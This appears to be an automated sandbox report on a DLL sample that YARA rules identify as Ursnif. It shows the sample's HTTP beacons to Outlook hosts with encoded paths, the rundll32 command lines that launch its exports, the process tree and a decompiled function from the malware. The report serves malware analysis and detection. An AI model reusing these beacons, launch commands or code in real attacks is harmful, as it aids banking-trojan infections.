                                                                                                          Location: https://outlook.office365.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 0cc5d072-33f2-6f76-f015-ee91bb583d6b
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: AS8P189CA0023
                                                                                                          X-RequestId: 1ed9ec8f-eb8c-4b13-9095-f7b5e6ea2573
                                                                                                          MS-CV: ctDFDPIzdm/wFe6Ru1g9aw.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AS8P189CA0023
                                                                                                          Date: Mon, 11 Oct 2021 20:36:17 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.64977952.98.208.66443C:\Windows\System32\loaddll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:36:18 UTC4OUTGET /signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.office365.com
                                                                                                          2021-10-11 20:36:18 UTC5INHTTP/1.1 404 Not Found
                                                                                                          Content-Length: 1245
                                                                                                          Content-Type: text/html
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 5c2fdc38-15df-1f17-392b-827de99c6af9
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-CalculatedFETarget: VI1PR0101CU002.internal.outlook.com
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-FEProxyInfo: VI1PR0101CA0050.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                          X-CalculatedBETarget: VI1PR06MB6510.eurprd06.prod.outlook.com
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-RUM-Validated: 1
                                                                                                          X-Proxy-RoutingCorrectness: 1
                                                                                                          X-Proxy-BackendServerStatus: 404
                                                                                                          MS-CV: ONwvXN8VFx85K4J96Zxq+Q.1.1
                                                                                                          X-FEServer: VI1PR0101CA0050
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AS9PR06CA0070
                                                                                                          Date: Mon, 11 Oct 2021 20:36:17 GMT
                                                                                                          Connection: close
                                                                                                          2021-10-11 20:36:18 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.64978040.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:36:19 UTC7OUTGET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.com
                                                                                                          2021-10-11 20:36:19 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Location: https://www.outlook.com/signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 788ce384-07aa-8879-d946-2cc1b02eb792
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: MWHPR11CA0026
                                                                                                          X-RequestId: 738ef795-5233-4365-a8d0-c1e1bcdbffa8
                                                                                                          MS-CV: hOOMeKoHeYjZRizBsC63kg.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: MWHPR11CA0026
                                                                                                          Date: Mon, 11 Oct 2021 20:36:19 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.64978152.97.178.34443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:36:19 UTC8OUTGET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: www.outlook.com
                                                                                                          2021-10-11 20:36:19 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Location: https://outlook.office365.com/signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: e3fdf5a0-ef19-6991-ae02-d09d6eb6eb6d
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-FEServer: AM7PR02CA0012
                                                                                                          X-RequestId: 28d1f2b0-6ee7-49fb-91b3-38f8f9eb5739
                                                                                                          MS-CV: oPX94xnvkWmuAtCdbrbrbQ.0
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AM7PR02CA0012
                                                                                                          Date: Mon, 11 Oct 2021 20:36:19 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.64978252.97.178.98443C:\Windows\SysWOW64\rundll32.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2021-10-11 20:36:19 UTC9OUTGET /signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jre HTTP/1.1
                                                                                                          Cache-Control: no-cache
                                                                                                          Connection: Keep-Alive
                                                                                                          Pragma: no-cache
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                          Host: outlook.office365.com
                                                                                                          2021-10-11 20:36:19 UTC9INHTTP/1.1 404 Not Found
                                                                                                          Content-Length: 1245
                                                                                                          Content-Type: text/html
                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                          request-id: 8895e295-2c4a-97c0-6a4c-33e5a4e5782a
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          X-CalculatedFETarget: VI1PR08CU014.internal.outlook.com
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-FEProxyInfo: VI1PR08CA0260.EURPRD08.PROD.OUTLOOK.COM
                                                                                                          X-CalculatedBETarget: VI1PR0401MB2509.EURPRD04.PROD.OUTLOOK.COM
                                                                                                          X-BackEndHttpStatus: 404
                                                                                                          X-RUM-Validated: 1
                                                                                                          X-Proxy-RoutingCorrectness: 1
                                                                                                          X-Proxy-BackendServerStatus: 404
                                                                                                          MS-CV: leKViEoswJdqTDPlpOV4Kg.1.1
                                                                                                          X-FEServer: VI1PR08CA0260
                                                                                                          X-Powered-By: ASP.NET
                                                                                                          X-FEServer: AM7PR04CA0027
                                                                                                          Date: Mon, 11 Oct 2021 20:36:19 GMT
                                                                                                          Connection: close
                                                                                                          2021-10-11 20:36:19 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          Analysis Process: loaddll32.exe PID: 3272 Parent PID: 1724

                                                                                                          General

                                                                                                          Start time:22:33:41
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll'
                                                                                                          Imagebase:0x1320000
                                                                                                          File size:893440 bytes
                                                                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597021606.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596902134.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.686530956.000000000325D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.641044169.000000000335B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.729588115.000000000315F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597111833.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596646171.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.540888918.0000000000E90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.597301011.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.749793100.0000000002D09000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.596793912.00000000034D8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: cmd.exe PID: 3144 Parent PID: 3272

                                                                                                          General

                                                                                                          Start time:22:33:41
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                                                                                                          Imagebase:0x2a0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: rundll32.exe PID: 5256 Parent PID: 3272

                                                                                                          General

                                                                                                          Start time:22:33:42
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,BeGrass
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.492494632.0000000002E20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: rundll32.exe PID: 5692 Parent PID: 3144

                                                                                                          General

                                                                                                          Start time:22:33:42
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\B6VQd36tt6.dll',#1
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.689258244.000000000509D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598927334.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.642989614.000000000519B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.752028518.0000000004C39000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598779799.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.492791250.0000000002E10000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599125921.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.598981939.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599214026.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599055381.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599169417.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.733741499.0000000004F9F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.599525991.0000000005318000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: rundll32.exe PID: 6284 Parent PID: 3272

                                                                                                          General

                                                                                                          Start time:22:33:46
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Fieldeight
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.513458257.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: rundll32.exe PID: 2772 Parent PID: 3272

                                                                                                          General

                                                                                                          Start time:22:33:52
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\B6VQd36tt6.dll,Often
                                                                                                          Imagebase:0x880000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: WerFault.exe PID: 2032 Parent PID: 5256

                                                                                                          General

                                                                                                          Start time:22:35:22
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 868
                                                                                                          Imagebase:0x70000
                                                                                                          File size:434592 bytes
                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: WerFault.exe PID: 2192 Parent PID: 6284

                                                                                                          General

                                                                                                          Start time:22:35:32
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 832
                                                                                                          Imagebase:0x70000
                                                                                                          File size:434592 bytes
                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Chronological Activities

                                                                                                          Analysis Process: WerFault.exe PID: 1984 Parent PID: 2772

                                                                                                          General

                                                                                                          Start time:22:35:34
                                                                                                          Start date:11/10/2021
                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 644
                                                                                                          Imagebase:0x70000
                                                                                                          File size:434592 bytes
                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Chronological Activities

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >

                                                                                                            Analysis Process: loaddll32.exe PID: 3272 Parent PID: 1724 loaddll32.exeCOMMON

                                                                                                            Executed Functions

                                                                                                            Function 6F031172, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81filetimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E6F031172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6F032160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6f0341c4;
				_push(_t15 + 0x6f03505e);
				_push(_t15 + 0x6f035054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6F03215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6f0341c8, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                            0x6f031172
                                                                                                            0x6f03117b
                                                                                                            0x6f03117f
                                                                                                            0x6f031185
                                                                                                            0x6f03118a
                                                                                                            0x6f03118f
                                                                                                            0x6f031192
                                                                                                            0x6f031195
                                                                                                            0x6f03119a
                                                                                                            0x6f03119b
                                                                                                            0x6f03119e
                                                                                                            0x6f0311a9
                                                                                                            0x6f0311b0
                                                                                                            0x6f0311b4
                                                                                                            0x6f0311b6
                                                                                                            0x6f0311b7
                                                                                                            0x6f0311ba
                                                                                                            0x6f0311bf
                                                                                                            0x6f0311c9
                                                                                                            0x6f0311cb
                                                                                                            0x6f0311cb
                                                                                                            0x6f0311df
                                                                                                            0x6f0311e5
                                                                                                            0x6f0311e9
                                                                                                            0x6f031239
                                                                                                            0x6f0311eb
                                                                                                            0x6f0311f4
                                                                                                            0x6f03120a
                                                                                                            0x6f031212
                                                                                                            0x6f031224
                                                                                                            0x6f031228
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f031214
                                                                                                            0x6f031217
                                                                                                            0x6f03121c
                                                                                                            0x6f03121e
                                                                                                            0x6f03121e
                                                                                                            0x6f0311ff
                                                                                                            0x6f031201
                                                                                                            0x6f03122a
                                                                                                            0x6f03122b
                                                                                                            0x6f03122b
                                                                                                            0x6f0311f4
                                                                                                            0x6f031241

                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?,?), ref: 6F03117F
                                                                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6F031195
                                                                                                            • _snwprintf.NTDLL ref: 6F0311BA
                                                                                                            • CreateFileMappingW.KERNELBASE(000000FF,6F0341C8,00000004,00000000,?,?), ref: 6F0311DF
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?), ref: 6F0311F6
                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6F03120A
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?), ref: 6F031222
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A), ref: 6F03122B
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F031132,0000000A,?), ref: 6F031233
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
